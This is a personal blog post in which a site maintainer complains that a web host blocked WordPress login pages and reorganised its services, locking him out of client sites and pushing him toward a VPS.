Well, their actions have forced me to disable CloudFlare and have effectively issued a denial of service attack against me and those whose site maintenance I take care of.

I was able to get my blog unlocked, but I have not been able to gain access to the necessary files for the other blogs.  I am now ripping support a new one and calling this a total customer service failure.  Pissed barely begins to describe my attitude on this, because their poor customer service has made my customer service look poor.  AKA shit rolls downhill, and it’s making me look bad.

It looks like, for that reason, this weekend I will finally fire up a VPS.  Currently I’m getting a little cash to help subsidize the cost, but I’m going to have to find a bit more.  It’s an expensive route, but it’s just about the only way I can make sure that “my hosting provider” doesn’t go !@#$ing around under the hood of my websites and screw crap up.  I was going to do this when a friend was looking at me to host a site for him and was going to cover a decent amount of the cost.  Looks like I’m just going to have to bite the bullet.

*Nitty details*  The web-hosting provider has blocked all access to the WordPress login page, resulting in no access at all.  The fix is to edit the .htaccess file, but they also restructured their “App Services” for security reasons and I can no longer find the other websites I’ve installed.  This has left me unable to alter or change the access for the other sites, effectively locking me and the users out unless they were already logged in.